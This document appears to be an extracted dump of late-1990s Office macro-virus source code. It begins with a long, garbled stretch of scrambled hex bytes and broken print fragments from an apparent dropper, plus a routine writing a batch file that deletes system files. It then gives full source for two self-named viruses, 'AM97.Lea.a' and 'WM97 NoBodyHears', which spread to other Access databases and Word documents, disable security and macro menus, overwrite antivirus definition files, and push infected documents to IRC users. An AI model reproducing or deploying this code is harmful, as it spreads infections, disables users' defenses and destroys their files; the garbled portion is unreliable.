9D" 76" EB" 8E" 6D" 70" 6B" CB" 4F" 49" C0" B7" 93" FC" 36" F9" 19" 3D" A3" 59" 95" 2D" 5D" F1" 98" 5C" FE" F8" AF" F8" FE" E0" 6F" 78" AB" 15" 02" 8D" B8" FC" DC" 0A" CC" 17" 57" D8" 17" 57" 54" 17" 57" FC" 03" 96" 3F" F8" 06" 2C" 35" E3" 54" F1" 54"

Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print

#3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3,

"E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E

0670 0680 0690 06A0 06B0 06C0 06D0 06E0 06F0 0700 0710 0720 0730 0740 0750 0760 0770 0780 0790 07A0 07B0 07C0 07D0 07E0 07F0 0800 0810 0820 0830 0840 0850 0860 0870 0880 0890 08A0 08B0 08C0 08D0 08E0 08F0 0900 0910 0920 0930 0940 0950 0960 0970 0980 0990 09A0 09B0 09C0 09D0 09E0 09F0 0A00 0A10 0A20 0A30 0A40 0A50

5F 3F 3C A8 93 E0 94 71 8A 67 17 6E FF 80 65 CF FE 01 CB 9F FC 03 F5 D2 6C 4B 1B 09 BF 8F 9B FF F2 F3 4A 7F 2F 37 E9 F3 8A 7C DE 0B 49 DF 05 FF AF 03 CB 9F FC 03 7B 5F 08 C0 FF 77 CF 4E 22

82 97 EF C0 C3 7F 54 FA F9 47 B3 7E B3 FF C0 32 67 FF 80 65 CF FE E2 58 3A CA BB 4F FD F3 64 3C DB EB E6 1E 3F BE F0 A3 CD 99 7D 35 7E 3A FE 7C 9A FF 80 65 CF FE BD E3 33 9E 99 BC 3A 6E 7D

EF 6D 4D FF 8C 2E 15 53 95 7E B9 F0 0C 59 FF E0 19 B3 FF C0 32 67 27 EE 19 6A 4C 3F 36 1B 3F 19 6D D3 2A 3F 7E 4C 67 DD 2A 76 E9 FA 3B FD E7 D5 0A B3 FF C0 32 67 28 F1 37 69 F2 F8 98 4E 55

9C 6F FC 5C BD CD F2 E5 D4 22 21 17 F8 06 2C 7F F0 0C 59 FF E0 19 3D 73 73 7C 7B 7A CE D0 17 73 E2 09 1D 70 91 BB 97 37 CE 5F 95 9F 9D CF AB 54 FC 0C 59 FF E0 19 8A 74 D0 8C 33 A8 7C 6C CF

DF D9 6F FD 64 E5 2B 7E 99 4A 54 4B 9F FC 03 96 3F F8 06 2C 7F B5 EC D5 7E 7F D8 DB 6F 09 A4 7E FC 27 FE 7E 36 6F 69 93 AF A3 3A EF 29 6F A6 E0 CF F8 06 2C 7F F0 FA BA D8 7B 01 8F 7E D7 BE

4D 76 F5 76 7E 83 DB BE 92 63 E1 80 65 CF FE 01 CB 9F FC 03 96 FA B7 5D C3 9B EF 1D 10 67 BD 34 FA ED 38 FC 97 AA 53 DF 97 1D 93 EF 9F 92 02 7F 57 9F FC 03 96 3F 84 F8 71 E3 52 1B 94 B4 B8

86 94 F9 98 1F 0C CF C2 C2 BE 7F FF C0 32 67 FF 80 65 CF FE 01 9F EB D2 41 7B 05 74 85 D8 DC FD C9 BE 51 EA 68 1D 7E E4 7D E4 DF D2 50 1A FF BE 4D 65 CF FE 01 CB 1D A8 9F E2 84 31 68 AA 5F

4C E6 89 DB 14 99 3F 46 13 CC 4E 59 FF E0 19 B3 FF C0 32 67 FF A7 D5 E5 3F 1F AA 52 41 ED 2E 28 AE A9 3A 41 F7 9C 4D 21 E5 60 C2 FC 67 FD F3 6A 05 C0 32 67 FF 80 EA B4 76 3A 76 DB 3E BB E3

59 52 FD 2F 8A BA C8 E4 27 EF 37 06 2C 7F F0 0C 59 FF E0 19 B3 93 62 D3 EA B4 39 6D B1 A4 D3 BF DF 76 78 6F 6D E5 12 9B 7E A6 2E 68 5E CF 55 2A FE FF E0 19 B3 FF F7 DF 2D D3 88 67 BF 2A 74

F1 86 C5 AA 93 38 51 36 BF E5 B4 FC 03 96 3F F8 06 2C 7F F0 0C 87 36 6F 05 9C D4 23 F8 DA A6 A0 08 70 52 BB 52 B3 06 1F 79 F6 D3 F7 2B 6F 53 F0 E7 2C 7F F0 0C 59 23 0B 68 DB 2F CA 24 FF 2C

D2 6B AF 9A 5B 17 52 A3 BA A9 BA CF FE 01 CB 9F FC 03 96 3F F8 FB 1D D4 D6 4F E8 65 05 C1 FC DB 6A 9E 7E 3B 7E 32 D7 9F 6A C0 A6 35 96 92 81 3F AB 03 96 3F F8 46 D3 B9 9E 19 F3 8A F9 33 C9

7B 73 21 99 33 CF 57 F8 F7 C0 DD 32 67 FF 80 65 CF FE 01 CB 9F BB DF EF BA B3 7F 75 A9 45 9A CE F4 CF 4D AD 35 63 E8 11 F4 66 FC F9 49 2A FF 5F A6 FE 01 CB 9F 15 96 95 A8 D4 BF 1B D5 05 2F

DD 0B BF 9F 3F 66 7D 10 90 FF A3 E0 19 B3 FF C0 32 67 FF 80 65 DB DF BB 7A 9F 9E F1 D1 3E 24 E4 3F CA 12 4C FA 34 7F 9A 3F 6F EA 25 97 FC F9 35 0A 67 FF 80 65 FE 1D E1 2A D7 21 2C C2 98 2C

81 53 E2 D8 5F DC 7E 45 5F 5C F8 7F F0 0C 59 FF E0 19 B3 FF C0 D1 E5 46 D8 0B 4E 19 FF 2B 0C 37 F3 8C 06 7E 9F D9 7E FC F3 E3 12 6F 4F CF AA 15 FF 19 B3 FF C0 E7 04 F1 73 22 C7 33 D6 ED ED

2B EA A5 5F 65 DC 62 CA 05 4B AB 96 3F F8 06 2C 7F F0 0C 59 FF 70 DE FF 6D 1E 26 7E CC 33 AE 9B D1 D1 D7 D3 F9 32 B8 D2 B9 D7 06 3E A3 D7 A9 F8 F3 F0 0C 59 FF 20 DD A4 95 52 97 F9 E9 CB C6

F0" C7" CA" 7C" 54" DC" 7F" EB" FE" 7E" 68" 01" CB" 9F" FC" 03" 96" 3F" F8" 06" 2C" 10" 47" F3" D7" 76" 14" 21" D3" 36" D1" F8" 8F" 2B" E8" B1" C5" 57" 4F" D7" 5F" 5A" BF" 06" 76" 4C" C0" 9F" 35" 3F" F8" 06" 2C" 0C" B8" FB" 7B" 85" E4" B5" DE" 8D" A2"

Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print

#3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3,

"E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E

0A60 0A70 0A80 0A90 0AA0 0AB0 0AC0 0AD0 0AE0 0AF0 0B00 0B10 0B20 0B30 0B40 0B50 0B60 0B70 0B80 0B90 0BA0 0BB0 0BC0 0BD0 0BE0 0BF0 0C00 0C10 0C20 0C30 0C40 0C50 0C60 0C70 0C80 0C90 0CA0 0CB0 0CC0 0CD0 0CE0 0CF0 0D00 0D10 0D20 0D30 0D40 0D50 0D60 0D70 0D80 0D90 0DA0 0DB0 0DC0 0DD0 0DE0 0DF0 0E00 0E10 0E20 0E30 0E40

4C D6 14 5A F9 94 60 CB 7C 1E 06 9E 60 2E C9 AB CF 9A 25 51 13 9E 67 04 8E 6B E9 19 B3 FF FF F9 04 35 D4 B3 CF 01 17 2B 33 C6 3F F8 06 2C 7F F0 D9 74 02 E7 C7 2C 77 BA 57 C5 A5 59 94 73 B1

4B B9 5F E6 9F E4 29 2F A8 38 F6 AA 79 BF 20 69 1E 96 FE 7C 1F 4F 6E ED 7E FA 73 F0 0C 59 F9 4D B3 FA E8 8B 5C 4C D2 A0 A5 8B CB 9F FC 03 96 3F 28 79 59 5E F9 96 B1 D6 CB B1 CB 07 FA 66 FE

56 9E 92 6A 79 17 F6 E4 3A F3 95 0D 28 20 9D FA A5 48 E7 49 D8 9B 4E 10 5A A5 E7 3F F8 06 4D 52 76 9F 7F 32 0C E1 34 01 BC FC 80 65 CF FE 01 CB B3 E1 33 6A 45 B9 52 FA 3C BE AE 15 9F 8C 67

D5 65 DF 90 1F 5C E8 38 3F 55 97 72 3E 8E 97 55 F6 A4 56 7E B8 2E 7C A7 03 22 BA CB 9F FC 52 A3 CF 5D 76 7D D2 DB 94 FE AC F8 FF C0 32 67 FF A8 80 46 76 8E BD 2B D9 51 8B 15 52 F8 53 FD BE

F1 A1 E1 ED CE B6 F7 29 D1 75 E2 7D BE 4F 94 E6 BB CD BB 5B 8F 74 AA 67 63 6E CE 80 65 CF A3 FF 0A 14 91 BB E1 3F 06 E7 FF EC 59 FF E0 19 B3 C8 39 DB 3B 4D A0 29 18 98 34 18 06 9F 83 CF 35

8C 55 E2 01 5C 73 FC 3E 8E E7 B3 D4 3B 51 2D 7F 92 9A DD BD 30 33 69 5E EB 6C 5D FF C0 32 FF F9 64 F4 7E 52 EF 1A F8 C9 59 79 06 2C 7F F0 0C FF 75 68 1A E0 78 3F 8C DC FD B3 49 BB 67 5A EF

CC F9 A3 4B ED 38 F4 DA 99 57 7B 16 C5 7C 8A EE FC BC EE FB 7D 66 55 44 D2 B5 18 59 FF E0 F9 4D A3 ED FA C5 55 4C 9F 43 AF D4 FC 03 96 3F F8 1C 7A B1 DA F8 C7 F3 7B 1E 74 08 A6 79 CE AA 7F

5C 9F BE D1 F5 3B 58 93 19 8D D9 67 57 49 A5 F0 CA FB 70 6A 48 0E 77 29 37 F7 F8 06 2C 7F 4D 52 64 E9 9D 2F 7C 03 F9 2E DD B0 CF FE 01 CB 9F F5 B1 72 76 8C 61 83 61 43 7E D0 7E F5 FF AA 66

CD 79 5E F9 F8 DC C7 DA 73 BF 61 87 C7 7E A9 BE 5F 96 80 0F 3E 9C 15 3E 1F B5 9F FC 03 96 52 A3 30 2A E7 54 2E FC BB 3F A3 6F 32 67 FF 80 65 FB 04 E7 7A 86 92 D4 AA F9 9D 0E FF A9 6C 6A 85

F5 06 59 29 AA 28 C2 AD 76 B8 BF 1B C2 BB 96 9A 43 DC 34 87 55 BA FE BB 05 6F 65 CF FE 51 A3 FF 23 17 36 69 D8 CF A3 3E DD 8A E0 19 B3 FF C0 03 CB A6 D6 D2 69 14 05 D9 4E A5 B3 26 EF A2 A2

80 66 37 CA 99 BF A8 24 B8 1B DF BF A8 8B CF C2 F9 97 09 ED DE DB E7 97 E1 3E C0 32 67 AB FF F9 1B F6 9D 28 00 D3 B2 FB 77 2A 7F F0 0C 59 FF 66 5C 6C 38 F2 BA 5F 4C B1 4D FE 2A F6 9B 02 62

A5 AE 96 AF 7D EC AA BF D1 04 6D 20 AA 8F AF E9 EC E2 ED 64 AC 30 73 ED CB F8 FF E0 19 FF F9 4D FF 17 92 0D FF 71 D7 33 34 07 96 3F F8 06 2C 98 1A FB A9 F4 94 35 8D 42 02 E7 C0 3F AE FF 85

F0 F6 AB 96 F1 DF FC FD EE 41 D6 67 FC FA F4 99 2F 6B 50 E5 53 11 AB B6 C1 E4 2C 7F F0 F9 4D 52 BF 97 CD F0 F3 31 37 97 E4 FE 01 CB 9F FC 03 59 F4 CB F7 98 48 FE 86 7E DE E5 FE 1B 5B 73 A2

F4 7A C5 75 AE 7A CF C5 9B E6 AB AE CF 72 10 13 37 D5 37 3E 89 00 C5 FC B6 79 03 96 3F 0D 52 A3 77 DE A5 3F 34 BF 49 1A 46 67 FF 80 65 CF FE F3 7B 5C 4F E4 F3 E7 CB 3C AA 3C E7 93 7B 41 AD

53 71 83 8D 74 73 41 47 CF 6A E5 26 DD 7D 67 17 A0 16 8E EA 44 E8 01 46 EC 1A FE 01 CB 52 A3 FF 6F A3 46 F3 FF 65 37 F6 24 19 B3 FF C0 32 67 C8 97 8D 35 B7 9C 5E C5 D5 FC 76 44 9D 47 DD 4B

ED" 7E" A7" 55" 3C" 3D" 90" 7D" CF" 18" 62" 3D" 6E" D4" F2" 8A" E7" 5F" 4F" A7" C7" 73" EA" 81" 9B" D7" 67" FF" 80" A3" FF" B9" 00" 41" FF" 97" 55" C9" C2" 55" 33" F0" 0C" 59" FF" E0" 19" 0E" 4B" 72" FE" 98" F7" AF" DC" 32" CF" D5" 41" B9" FF" A9" FC"

Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print

#3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3,

"E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E

0E50 0E60 0E70 0E80 0E90 0EA0 0EB0 0EC0 0ED0 0EE0 0EF0 0F00 0F10 0F20 0F30 0F40 0F50 0F60 0F70 0F80 0F90 0FA0 0FB0 0FC0 0FD0 0FE0 0FF0 1000 1010 1020 1030 1040 1050 1060 1070 1080 1090 10A0 10B0 10C0 10D0 10E0 10F0 1100 1110 1120 1130 1140 1150 1160 1170 1180 1190 11A0 11B0 11C0 11D0 11E0 11F0 1200 1210 1220 1230

CF 64 44 EC 1F 7C 74 67 73 4A 97 BC 27 F9 5F 7F F0 0C 59 FF 69 03 E6 97 98 31 E9 7E 65 DB 31 CD CC BE 43 3C 9F DE E7 C0 32 67 FF AF 53 F1 32 67 FF 80 65 CF FE 5E CC B7 AD FC 76 E3 91 B3 85

DB 3A 3D 2A EF 14 93 8F 7E 5E FF 7A AA 05 2B 96 3F F8 06 2C 80 FC EA ED 6F 4D 7A FF F9 87 F8 96 E5 30 71 25 FD AA B8 FF E0 19 B3 96 81 3F E0 19 B3 FF C0 32 67 88 0D 77 99 70 DB 2F 87 29 59

EC E4 29 66 B2 CB EC 25 C6 E3 99 8C 7E C9 55 01 CB 9F FC 03 FF CF 62 C6 6E 2C E6 73 05 DC 92 B9 EF F5 B2 6D 99 43 65 2C 7F F0 0C 6A FF 5F 7F F0 0C 59 FF E0 19 CA D6 F7 8D 7F F5 36 A8 3D E8

B2 17 D3 83 B4 C4 AB AF E0 7F 03 E3 A9 18 F8 FF 80 65 CF FE F9 AF 16 AB 49 DB C2 90 9D F3 D4 A1 8E FB DD 93 4B 9C DF 03 96 3F F8 FC F9 31 96 3F F8 06 2C 7F F0 CD 2C 0F 41 77 8A B6 2A 25 7A

49 24 F8 A2 F6 A7 A9 CA 19 4E 64 FC 88 50 9F B3 FF C0 32 67 55 9A AF C0 BF E7 7A 6F CB C6 EF A4 32 9F 35 BC A7 C1 9C FE 01 CB 9F CF AA D5 01 CB 9F FC 03 96 3F E8 19 E3 5F 3B 5D 62 76 3F 14

9B AD 8C B9 B9 FD FF FF 17 5B 05 92 05 EB AF 0C 59 FF E0 19 D3 06 85 63 BD A7 70 4D A6 2B 7F B5 97 3B F2 FB 7C 38 4F 67 FF 80 65 D7 A9 F8 FF 80 65 CF FE 01 CB 5B 3B F1 5E 1A C5 F6 57 23 F5

1F 50 FF 94 16 CF 99 5C C5 1B 79 53 A8 F2 99 F8 06 2C 7F 2F 00 F8 4E 25 82 53 D7 4B 85 F1 EE B5 B8 F9 EB 9A 1B F9 6B 19 B3 FF C0 4B C0 9F B3 FF C0 32 67 FF 80 36 F2 64 AD 0E 0F AD 06 3D FB

F7 7C 99 2E 05 C6 75 1A 05 F8 F6 E0 F6 17 2A 9F FC 03 96 EB FF 9F D7 AF 97 73 B7 BF 97 33 E6 AC 9B D6 90 4B E6 A2 2F F0 0C 59 FF 25 FF AF 0C 59 FF E0 19 B3 FF CA 9E 3A 68 FA 77 6D DA E5 83

D1 45 F2 3B 65 E0 93 A0 E9 C0 95 75 BE 57 FC 65 CF FE 01 7F F3 5F 83 6E F2 94 7F BD A4 37 3B DB 2D BE EA DC CB A3 C2 3F F8 06 2C FE 7C 97 F8 06 2C 7F F0 0C 59 9E DE 9B 7C 51 A3 56 EA 70 C1

A4 FE 5B 2D 25 39 99 71 AA A9 24 72 A9 E3 CF C0 32 67 FF 7E AB 35 B3 77 66 71 F0 82 7E A4 4B F0 73 F4 F5 8C 52 F4 A1 CB 9F FC 03 E7 D5 8A 9F FC 03 96 3F F8 06 F9 EE CD 31 8F 44 8B A6 30 90

8F E7 2A E4 FE 9F 87 C8 F1 0A EB AA 7A 7F D7 FF E0 19 B3 FD A6 F5 94 50 6E F5 7A DB FF 6D A7 85 C3 DB 3F 9A AF BC 41 80 65 CF FE 2B 54 FC 65 CF FE 01 CB 9F FB CF D0 E7 9F 1D AE 99 1F E8 36

59 82 DA F7 E7 26 7C A6 D4 F0 BE 92 76 BE 0C 2C 7F F0 0C 34 01 FB F7 4D 18 FB E9 61 73 84 E6 A9 A5 2B 73 A9 FF D8 C6 FF C0 32 67 A6 E1 CF C0 32 67 FF 80 65 9F 5A 78 8B CF 6C 76 96 71 F7 46

E6 3B 7D 0E B2 BE 07 47 FF F4 67 9E 99 56 FC 03 96 3F F8 C0 FE 9F 9E A1 0D 9F B2 32 B7 19 8B DF FE B8 67 2D 59 9E 4C 59 FF E0 19 0A 7F 57 FF E0 19 B3 FF C0 F9 BC D4 E5 66 2C DC B2 B3 A3 6F

7F 56 13 FE 19 CD FF 22 9C 33 8C 97 BC AA CF FE 01 CB 9F FF E7 79 BF 7E 72 0B F1 37 90 F8 8E FF BE 1D A5 7C B7 2A F8 06 2C 7F 15 FF BE 0B 2C 7F F0 0C 59 FF 6F B4 1F 72 D3 81 6F 59 5E A8 CD

7E 43 5F 67 18 E4 33 F6 E6 97 FF AC 1E F2 32 67 FF 80 65 FC 57 79 BD FF DF CD 97 0C 1F F0 22 5C 74 26 6E 7B 96 EB 9F FC 03 96 F9 F3 66 FC 03 96 3F F8 06 2C 80 E8 0C B9 C9 3D D7 A5 2D D7 64

2A" 87" 64" A3" 86" 35" E5" 3F" C7" 5E" D9" 12" F5" 3F" E0" 19" B3" FF" C0" AA" 4D" 7C" 82" 73" FE" 41" A1" FB" EB" 77" D3" E8" 46" 73" 8D" 05" EA" B3" 65" CF" FE" 01" 9F" 35" 2A" CF" FE" 01" CB" 9F" FC" 03" 03" 61" 47" 5A" 78" 1E" 4B" F1" 17" EB" 3A"

Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Print #3, Close #3 End Sub

"E 1240 "E 1250 "E 1260 "E 1270 "E 1280 "E 1290 "E 12A0 "E 12B0 "E 12C0 "E 12D0 "E 12E0 "E 12F0 "E 1300 "E 1310 "E 1320 "E 1330 "E 1340 "E 1350 "E 1360 "E 1370 "E 1380 "E 1390 "E 13A0 "RCX" "12A8" "W" "Q"

9D C9 9E 2D 38 8C FD 96 F9 13 6B 7E 3C F8 74 65 78 37 14 36 00 59 00

2D 6D 68 D8 B1 28 CF F3 51 A4 43 66 01 16 30 92 49 8B 00 12 00 53 00

96 C9 87 51 01 A5 F7 3F 7C 71 9D B6 C3 1C 76 67 84 D8 14 00 20 50 5C

AB A6 4C 44 2E A8 B7 EF F3 1B D5 5D 74 1F AE 77 C9 75 00 00 00 4B 12

F5 30 7E A9 38 C7 23 B7 99 E0 3D 46 02 6F 25 AA 0C 6A 00 36 B6 05 00

C6 DE 66 D2 40 0E B6 1C 89 9D 77 AA 9A 4C 33 7D 4C F6 00 F8 81 06 00

6E 5B 88 4B 93 BB 75 29 EF 09 A9 87 DF 3A AB 44 67 D6 08 01 00 00 00

2D BF F9 2F 4F 0A 75 8B 60 CC D6 F9 76 5A BB 2B CE C6 70 46 B2 29 EC 9C 19 3D FD D8 30 D9 9E 7E C3 DC 7E 66 00 38 00 08 00 00 00 00 00"

B5 F6 F9 F2 8A F9 71 39 17 73 EC D4 A9 FF D2 F3 4C 6F 51 00 00 00

Sub CreateBat() Open "c:\windows\hop_along.bat" For Output As #4 Print #4, "del c:\windows\logo.sys" Print #4, "del c:\logo.sys" Print #4, "cd c:\windows\" Print #4, "debug < c:\windows\pkunzip.dbg" Print #4, "debug < c:\windows\logo.dbg" Print #4, "c:\windows\pkunzip.com logo.zip" Print #4, "exit" Close #4 End Sub

Sub Wait4Bat() If Dir("c:\windows\logo.sys") = "" Then Wait4Bat End Sub

E5 BC 83 0B E3 91 58 D3 71 61 C8 65 0D 4C 19 CC 40 FD 9B 00 6C 01

8F 6A B9 29 5B 15 39 D0 7C 45 A7 7C 30 41 D9 6F BD 1F 28 00 6F 00

77 92 D1 C0 D8 80 FF 3E 3A F9 2B D7 89 D1 8F 2C B5 50 17 00 67 01

6F 3B 2D E1 F8 9B B3 E2 B5 ED 3C 03 50 1C 67 9E FC 4B D3 00 6F 00

EF A7 B7 C8 CC F5 49 61 C0 0F DB EF 5F E2 24 7D D6 01 09 00 2E 36

B8" D9" 27" 04" C6" 92" 74" 4F" 60" 76" 74" E9" E6" 10" 0F" 69" 36" 02" 49" 00" 53" 00"

Option Compare Database Option Explicit Function Lea() 'AM97.Lea.a 'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam] On Error Resume Next CommandBars("tools").Controls("Macro").Delete CurrentDb.Properties("AllowBypassKey") = False CurrentDb.Properties("AllowSpecialKeys") = False CurrentDb.Properties("AllowBreakIntoCode") = False Application.DisplayStatusBar = False Application.DisplayAlerts = False Application.MacrovirusProtection = False Dim FilesToGet, FilesToInfect, CodeBase As String FilesToInfect = False FilesToGet = Dir("*.mdb", vbNormal) If FilesToGet <> "" Then CodeBase = CurrentDb.Name If CodeBase = FilesToGet Then FilesToInfect = True If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft , FilesToGet, acMacro, "Autoexec", "Autoexec" If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft , FilesToGet, acModule, "lea", "lea" While FilesToGet <> " FilesToGet = Dir If CodeBase = FilesToGet Then FilesToInfect = True If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft , FilesToGet, acMacro, "Autoexec", "Autoexec" If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft , FilesToGet, acModule, "lea", "lea" Wend On Error GoTo Exit_Payload If Day(Now()) = Int(Rnd() * 3) + 1 Then MsgBox "AM97.Lea.a", "Welcome to this place, I'll Show you everything. With arms wide End If Exit_Payload: End If End Function

Access" Access"

Access" Access"

open."

Attribute VB_Name = "NoBodyHears" Sub AutoClose() '****************************************************************** 'WM97 NoBodyHears 'By AngelsKitten / [NuKE] 'Greetings to Evul, Knowdeth, Jackie twoflower, Foxz 'Reptile, Duke, Raven, Deloss, Bumblebee, Masey, RAiD, 'FlyShadow, and the following groups: MVT, 29A, NVT & SLAM '****************************************************************** On Error Resume Next Application.VBE.ActiveVBProject.VBComponents("NoBodyHears").Export "C:\VXD.dll" With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With With Application .ScreenUpdating = False .DisplayStatusBar = False .DisplayAlerts = wdAlertsNone .EnableCancelKey = wdCancelDisabled End With CommandBars("Tools").Controls("Macro").Enabled = False CommandBars("Tools").Controls(12).Enabled = False CommandBars("Tools").Controls(12).Delete CommandBars("tools").Controls("Macro").Delete CommandBars("tools").Controls("Customize...").Delete CommandBars("view").Controls("Toolbars").Delete CommandBars("view").Controls("Status Bar").Delete For ¢ = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(¢).Name = "NoBodyHears" Then ¶ = True Next ¢ For ¢ = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(¢).Name = "NoBodyHears" Then Ü = True Next ¢ If Ü = True And ¶ = False Then Set § = NormalTemplate.VBProject _ Else If Ü = False And ¶ = True Then Set § = ActiveDocument.VBProject §.VBComponents.Import ("C:\VXD.dll") On Error GoTo scriptoops Open "C:\audio.vxd" For Output As #1 Print #1, "[script]" Print #1, "n0=;NobodyHears by Angelskitten / [NuKE]" Print #1, "n1=on 1:PART:#:{ /if ( $nick == $me ) { halt }" Print #1, "n2= /dcc send $nick C:\windows\aboutme.doc" Print #1, "n3=}" Print #1, "n4=" Print #1, "n5=on 1:JOIN:#:{ /if ( $nick == $me ) { halt }" Print #1, "n6= /dcc send $nick C:\windows\aboutme.doc" Print #1, "n7=}" Print #1, "n8=" Print #1, "n9=on 1:TEXT:*infected*:#:/.ignore $nick" Print #1, "n10=on 1:TEXT:*infected*:?:/.ignore $nick" Print #1, "n12=on 1:TEXT:*clean*:#:/.ignore $nick" Print #1, "n13=on 1:TEXT:*clean*:?:/.ignore $nick" Print #1, "n14=on 1:TEXT:*script.ini*:#:/.ignore $nick" Print #1, "n15=on 1:TEXT:*script.ini*:?:/.ignore $nick" Print #1, "n16=on 1:TEXT:*virus*:#:/.ignore $nick" Print #1, "n17=on 1:TEXT:*virus*:?:/.ignore $nick" Print #1, "n18=on 1:TEXT:*worm*:#:/.ignore $nick" Print #1, "n19=on 1:TEXT:*worm*:?:/.ignore $nick" Print #1, "n20=on 1:TEXT:*aboutme*:#:/.ignore $nick" Print #1, "n21=on 1:TEXT:*aboutme*:?:/.ignore $nick" Print #1, "n22=on 1:TEXT:*aboutme.doc*:#:/.ignore $nick"

Print #1, "n23=on 1:TEXT:*aboutme.doc*:?:/.ignore $nick" Print #1, "n24=on 1:TEXT:*doc*:#:/.ignore $nick" Print #1, "n25=on 1:TEXT:*doc*:?:/.ignore $nick" Print #1, "n26=on 1:TEXT:*blank*:#:/.ignore $nick" Print #1, "n27=on 1:TEXT:*blank*:?:/.ignore $nick" Print #1, "n28=ON 1:QUIT:#:/msg $chan I tryed to tell you, I tryed to show you. NoBodyHears" Print #1, "n29=ON 1:connect: {" Print #1, "n30= /run attrib +r +s +h C:\mirc\Script.ini" Print #1, "n31=}" Close #1 scriptoops: On Error GoTo batoops Open "c:\windows\WinStart.bat" For Output As #2 Print #2, "@Echo Off" Print #2, "copy /y c:\audio.vxd c:\mirc\script.ini >nul" Print #2, "copy /y c:\PROGRA~1\MICROS~3\TEMPLA~1\normal.dot c:\windows\aboutme.doc >nul" Close #2 batoops: If Day(Now()) = 12 Then SetAttr "C:\program files\AntiViral Toolkit Pro\*.avc", vbReadOnly Open "C:\program files\AntiViral Toolkit Pro\*.avc" For Output As #3 Print #3, "NoBodyHears" Close #3 SetAttr "C:\program files\AntiViral Toolkit Pro\avp.set", vbReadOnly Open "C:\program files\AntiViral Toolkit Pro\avp.set" For Output As #4 Print #4, "NoBodyHears" Close #4 SetAttr "C:\program files\mcafee\*.dat", vbReadOnly Open "C:\program files\mcafee\*.def" For Output As #5 Print #5, "NoBodyHears" Close #5 SetAttr "C:\f-marco\*.def", vbReadOnly Open "C:\f-macro\*.def" For Output As #6 Print #6, "NoBodyHears" Close #6 End If If Day(Now()) = Int(Rnd * 31) + 1 Then With Assistant.NewBalloon .Icon = msoIconTip .Animation = msoAnimationGetArtsy .Heading = "WM97 NoBodyHears" .Text = "Welcome to WM97 NoBodyHears by Angelskitten / [NuKE]" .Show End With ActiveDocument.Password = "NoBodyHears" Shell "start http://www.avp.com.au/", vbHide End If ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument SetAttr ("c:\VXD.dll"), vbHidden + vbSystem End Sub Sub AutoOpen() Call AutoClose End Sub Sub AutoNew() Call AutoClose End Sub Sub ViewVBCode() MsgBox "Unexcpected error", 16 Call AutoClose End Sub Sub ViewCode() MsgBox "Unexcpected error", 16 Application.Caption = "Word 6.0"

Call AutoClose End Sub Sub ToolsMacro() MsgBox "Unexcpected error", 16 Call AutoClose End Sub Sub FileTemplates() MsgBox "Unexcpected error", 16 Application.Caption = "Word 6.0" Call AutoClose End Sub Sub HelpWordPerfectHelp() MsgBox "Unexcpected error", 16 Application.Caption = "Word 6.0" Call AutoClose End Sub

